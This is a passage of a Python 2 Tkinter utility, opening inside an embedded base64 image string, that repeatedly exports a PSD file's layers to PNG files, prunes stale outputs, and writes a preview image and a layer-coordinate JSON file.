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agVN/pc+/de6R2+Pmv8AGLrumrZt09s7dpKmi3RhtmDDUbzZTcdfufcOFg3HhcNiduY2KqzeUrchgKhayNIIHZqa720gke690IOR+RfQ2H3ViNi5jt/rvEb0zsUM2J2nk924Wi3BXLUX8IgxdRWJVtJIQQF06ieLX9+690CGM7pzXS03yP7C+UvcfVtB1Xgey8TRddrgo5KWTYOzMlhMLT4vGb5q5Glll3HmM1PJN/qBFNGwIRgqe690jtk/zPPiXvnrLtTtil3Xubbe2OnpcIu7oN9bI3NsrOtSbrSF9mZXDYLcWPoMnmMTvL7hFxs8MbLUSEoAHVlHuvdCt8a/mB178mchv/AbdwO8dnbr61nwo3Rtfe+Kix2Rp8duWg/im3cxT1FHU12Nq6DLUILoY5meMqVcKwt7917ozozmFaKKdcxizDPL4IZhkKQxTTEMfDFIJtEktlJ0gk2B9+691nosnjskJ2x2QosgtLO9LUtRVcFUKeqjsZKacwSSCKeO41I1mF+R7917qb7917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6//0d/j37r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3WuX8wP5PA+VX8y7dnc1VuHtzqPYfYvxnoMa/a3TG9J9tV9J29tHPQ4+lpN20D5GSmzVFX7Xq4/FTS4+elmSlYO8bqvk917o
Nd5/y2vkH17jeiKjsDovGfI/ZfV20OyenstsL4o9l5HonduWwmc3PFltt9lViZPN7Qw9Zkd5Y6KQbtxzZEwS1UqSJ5tHv3Xujx434pfK3ceI+N3fmzNv9PfHfunoDbfYHXew+gc1UZPf/W+K6Y3lU7d/h23Nw5+hjxlXS9jUFNs7HyNX0ImpKYyz0yipT99/de6WXWnw07RqPmJjfkh8jdt9T9j7i3x8eMn1v2Lm8JgIGwG3snhN3jJbSweBx+e+6yE1LPgs5WRS1IVTK0BZ9GpVb3XuiL9x/wAjfsPsWvp+n07c2pm/ifLnM+cFtncuNzB3b03sjdnZkfYu6NrddQQVb4SfI5CJP4PR5CVYWxmLVYYoyusP7r3R9Orv5W2xusu9ekvkJuLtfc3YO5ekukdy9LS1m9Mdgmn3fiJ6vHpsndu5q2mpqSmXd2xNs00+MSvjijlqYJyzstip917qmL5ubf8Aj11D2fjPjXvr5MfBDA7L773RuvIbg7U3xsbG57vbrTEU9OMhBNkt2/34jgXcsYaOixGQMKtGyxXgYodXuvdWb7p/lcbW+RfTfdOD2f8AJvJ7i6Y+UWJ+MO/NtZp8fFuub+8PUGOxdNUb2XcDZKGn3Lh+zNr4LEq8HiiWKWKWbXIJdC+690UX+bd8suofjjuPsP467S+FEXyZ7B7C+P3XtL3lvLcO7RsXqPZ2xNrVO44+uDvDPU5qHwe4qTJrWVWPKCgnc+Px1GpF8fuvdLT/AIT6/Hr5gbO+OtV2R3mvVmwupe9afcu6Nu9U4vZG5x3QKfMZEUW1czvntbcW5qvJ53F0e0aZYcZT1NH94tHJD5JgUC+/de6P/L/Kz6+x21vjfsbZvcfcO2do/H7vLNdzT41s/FkqjsSmy+I3JiI9hbnrZ4UkO2MVS7g8NMiAlKeEKbyESr7r3Rz+jfjztLoKbs6Taec3flY+0+xcz2XmKXc+Z/i1Lic1m4qaKrotvxmnhagxIFMpWJmkIJ/VawHuvdD37917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de697917r3v3Xuve/de6/9Lf49+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3XvfuvdE5+cXxbz3y76Wk6nwHauf6omk3Bis1W5HDSZVaDcdBjmkabau6abB5jAZXIbZyhcfc08VZCJggV9UZZG917opfw0/k/dB/F7fVR25uXGbF7C7KOGq8Bhf4X1dtDZmxto47I1ENVlZsBtqgoqipqs1mJqdDU5HJVVdWuAVWRVZgfde6t0p6enpIIaWkghpaanjSGCnp4khggijULHFDDGqxxxooACqAABx7917onXZf8v34jdxd3Y75C9ndO4HenZeNpsFDHV56avrtv1lRtaeqqNs5XKbRmqm2zlc5t+Wsk+zrJ6WSogBAVwAAPde6ONBBDTQxU9NFHBTwRpFDBCixxRRRqFSOONAFREUAAAWA9+691l9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3Xvfuvde9+691737r3X/2Q==
"""
}
# Mutable state shared between the worker thread and the Tk UI.
data = {
    "app": None,
    "running_times": 0,
    "generated_files": [],
}
# Clamp the configured window dimensions to a sane 30x30 minimum.
for _dim in ("width", "height"):
    if opt["app_options"][_dim] < 30:
        opt["app_options"][_dim] = 30
# The generated option/output files must survive the cleanup pass,
# so list them among the ignored names.
opt["ignores"].extend([opt["preview_file"], opt["coord_file"]])
### main thread starts here ###
def psd2png(app, stop_event):
    """Worker-thread entry point: repeatedly export PSD layers as PNGs.

    app: the tkApp instance whose canvas/label display progress.
    stop_event: threading.Event; setting it ends the export loop.

    Loops until stop_event is set, sleeping opt["delay_sec"] seconds
    between passes.
    """
    # store app and stop event in the module-level state dict so the
    # nested run() and the save/cleanup helpers can reach them
    data["app"] = app
    data["stop_event"] = stop_event
    def run():
        # one full export pass
        data["running_times"] += 1
        # show the "working" image on the app canvas
        onwork_image = Image.open(cStringIO.StringIO(base64.b64decode(opt["onwork_image_source"])))
        # keep a reference on the app object: Tkinter does not keep
        # PhotoImage objects alive by itself
        data["app"].preview_image = ImageTk.PhotoImage(onwork_image)
        data["app"].view_canvas.create_image((onwork_image.size[0]/2,
                                              onwork_image.size[1]/2),
                                             image=data["app"].preview_image)
        # load the psd file fresh each pass so external edits are picked up
        data["app"].output.config(text="[+] loading psd file")
        psd = PSDImage.load(opt["file_name"])
        data["app"].output.config(text="[+] saving layers as png files")
        save_layers_to_png(psd)
        # remove files that no longer correspond to a layer
        data["app"].output.config(text="[+] removing unsued files")
        remove_files_not_in_layers(psd)
        if opt["create_preview"]:
            data["app"].output.config(text="[+] creating preview file")
            create_preview(psd)
        if opt["create_coord"]:
            data["app"].output.config(text="[+] creating coordination file")
            create_coord(psd)
    while not data["stop_event"].is_set():
        run()
        # commented-out best-effort wrapper kept verbatim from the original:
        """
        try:
            run()
        except:
            print ("Error: ignoring io error")
            pass
        """
        if not data["stop_event"].is_set():
            # show the "recharging" image between passes
            recharging_image = Image.open(cStringIO.StringIO(base64.b64decode(opt["recharging_image_source"])))
            data["app"].preview_image = ImageTk.PhotoImage(recharging_image)
            data["app"].view_canvas.create_image((recharging_image.size[0]/2,
                                                  recharging_image.size[1]/2),
                                                 image=data["app"].preview_image)
            data["app"].output.config(text="[+] Run count: %d times"%(data["running_times"]))
            print("[+] Run count: %d times"%(data["running_times"]))
            # wait for delay before the next pass
            time.sleep(opt["delay_sec"])
    # thread terminates
def makedirs(dirname):
    """Create *dirname* (and any missing parents) if it does not exist.

    Safe to call repeatedly. The original exists()-then-makedirs guard had
    a check-then-create race: another thread/pass could create the
    directory between the two calls and os.makedirs would then raise.
    """
    try:
        os.makedirs(dirname)
    except OSError:
        # raised when the directory already exists, or on a real error
        # (e.g. permissions) — only swallow the "already there" case
        if not os.path.isdir(dirname):
            raise
# Tkinter needs to preserve reference to temp image
def save_layers_to_png(psd, groupname=None):
    """Export every layer of *psd* (recursing into groups) as a PNG file.

    Files land under opt["dirname"], with one sub-directory per layer
    group. A layer is rewritten only when its perceptual hash differs from
    the file already on disk; every processed layer name is recorded in
    data["generated_files"] so the cleanup pass keeps its file.
    """
    def save_layer(layer, groupname=None):
        try:
            # PIL conversion typically raises on empty layers
            layer_image = layer.as_PIL()
        except Exception:
            print("[!] as_PIL Error: %s" % layer.name)
            return
        # echo progress on the UI label
        # (fixed: the original used the global `app`, which is only defined
        # when the file runs as a script, instead of data["app"])
        if data["app"] is not None:
            data["app"].output.config(text=layer.name)
        dirname = opt["dirname"]
        # grouped layers go into a sub-directory named after the group
        if groupname is not None:
            dirname += "/" + groupname
        makedirs(dirname)
        targetfile = "%s/%s.png" % (dirname, layer.name)
        if os.path.isfile(targetfile):
            # compare perceptual hashes and only rewrite changed layers
            existing_file_hash = imagehash.average_hash(Image.open(targetfile))
            layer_hash = imagehash.average_hash(layer_image)
            if existing_file_hash != layer_hash:
                print("Found changed layer: %s" % (layer.name))
                layer_image.save(targetfile)
        else:
            # create new file
            print("Found new layer: %s" % (layer.name))
            layer_image.save(targetfile)
        # record the layer unconditionally so unchanged files survive the
        # cleanup pass (fixed: the original also re-saved every layer
        # unconditionally after the branch above, defeating the hash check)
        data["generated_files"].append(layer.name)
        # layers whose name contains a delivery keyword are also copied
        # to that keyword's target directory
        for key, todir in opt["unity_delevery_keychar"].items():
            if key in layer.name.split():
                makedirs(todir)
                layer_image.save("%s/%s.png" % (todir, layer.name))
    # read layers from psd file
    for layer in psd.layers:
        # allow the UI stop button to abort mid-run
        if data["stop_event"].is_set():
            break
        # groups become sub-directories; recurse with the group name
        if type(layer) == Group:
            save_layers_to_png(layer, layer.name)
            continue
        # dive to save logic
        save_layer(layer, groupname)
def remove_files_not_in_layers(psd, dirname=None):
    """Remove files in the output directory that no exported layer produced.

    Walks opt["dirname"] (or *dirname* when recursing into a group
    sub-directory) and unlinks anything whose base name is not recorded in
    data["generated_files"], skipping names listed in opt["ignores"].
    """
    # confirm dirname (in case, using a groups directory)
    current_dir = opt["dirname"] if dirname is None else dirname
    # de-duplicate the bookkeeping list once up front
    data["generated_files"] = list(set(data["generated_files"]))
    generated = set(data["generated_files"])
    for dir_file in os.listdir(current_dir):
        # fixed: the original substring-matched dir_file against
        # ", ".join(opt["ignores"]), so e.g. a file named "o" matched the
        # ignore entry "coord.json"; use exact membership instead
        if dir_file in opt["ignores"]:
            continue
        # strip the extension to recover the layer name
        # (fixed: dir_file[:-4] also chopped four chars off
        # extension-less names)
        if os.path.splitext(dir_file)[0] in generated:
            continue
        # not produced by any layer: delete it
        f = current_dir + "/" + dir_file
        if os.path.isdir(f):
            # f is a group directory: clean it recursively
            remove_files_not_in_layers(psd, f)
        else:
            try:
                os.unlink(f)
            except OSError:
                # report but keep going; other files may still be removable
                # (fixed: guard data["app"] before touching the UI label)
                if data["app"] is not None:
                    data["app"].output.config(text="[!] Delete Error")
                print("[!] delete error")
def create_preview(psd):
    """Render the whole PSD and write it as the configured preview file."""
    preview_path = opt["dirname"] + "/" + opt["preview_file"]
    merged = psd.as_PIL()
    merged.save(preview_path)
def create_coord(psd):
    """Dump each top-level layer's geometry/visibility to a JSON file.

    Writes opt["dirname"]/opt["coord_file"] mapping layer name to its
    name, position (x/y), size (width/height), opacity and visibility.
    """
    makedirs(opt["dirname"])  # create directory if not exists
    # fixed: the original named this dict `data`, shadowing the
    # module-level state dict of the same name
    coords = {}
    for layer in psd.layers:
        coords[layer.name] = {
            "name": layer.name,
            "x": layer.bbox.x1,
            "y": layer.bbox.y1,
            "width": layer.bbox.width,
            "height": layer.bbox.height,
            "opacity": layer.opacity,
            "visible": layer.visible,
        }
    # save as json; `with` guarantees the handle is closed even on error
    jsondata = json.dumps(coords, indent=4, sort_keys=True)
    with open(opt["dirname"] + "/" + opt["coord_file"], "w+") as result_file:
        result_file.write(jsondata)
# APPLICATION LAYER
class tkApp:
    """Tkinter front-end for the PSD-to-PNG exporter.

    usage:
        master = Tk()
        app = tkApp(master)
        master.mainloop()
    """
    def __init__(self, master):
        """Build the widget tree, show the logo, and bind shortcuts."""
        # app master
        self.master = master
        # preserve current state
        self.is_running = False
        self.thread_stop_event = threading.Event()
        # main frame
        self.frame = Frame(self.master,
                           width=opt["app_options"]["width"],
                           height=opt["app_options"]["height"])
        self.frame.pack()
        # label for text output
        self.output = Label(self.frame,
                            width=opt["app_options"]["width"],
                            justify=LEFT, anchor=NW,
                            bg="#DBC", font="Ubuntu")
        self.output.pack(side=LEFT, fill="x")
        # preview canvas with the configured size
        self.view_canvas = Canvas(self.master,
                                  width=opt["app_options"]["preview_image_width"],
                                  height=opt["app_options"]["preview_image_height"])
        self.view_canvas.pack(fill="both")
        logo_image = Image.open(cStringIO.StringIO(base64.b64decode(opt["logo_image_source"])))
        # NOTE: the PhotoImage must be bound to the instance — Tkinter does
        # not keep canvas images alive on its own
        self.preview_image = ImageTk.PhotoImage(logo_image)
        self.view_canvas.create_image((logo_image.size[0]/2,
                                       logo_image.size[1]/2),
                                      image=self.preview_image)
        # frame that contains the buttons
        buttons_frame = Frame(self.master)
        buttons_frame.pack(side=BOTTOM, fill="x")
        # toggle: run button <-> stop button
        self.button_run = Button(buttons_frame,
                                 text="Run", command=self.run_manager)
        self.button_run.pack(side=TOP, fill="x")
        # quit tkApp
        self.button_quit = Button(buttons_frame,
                                  text="Quit", command=self.quit)
        self.button_quit.pack(side=TOP, fill="x")
        # keyboard shortcuts: Return toggles run/stop, Escape quits
        self.master.bind("<Return>", self.run_manager)
        self.master.bind("<Escape>", self.quit)
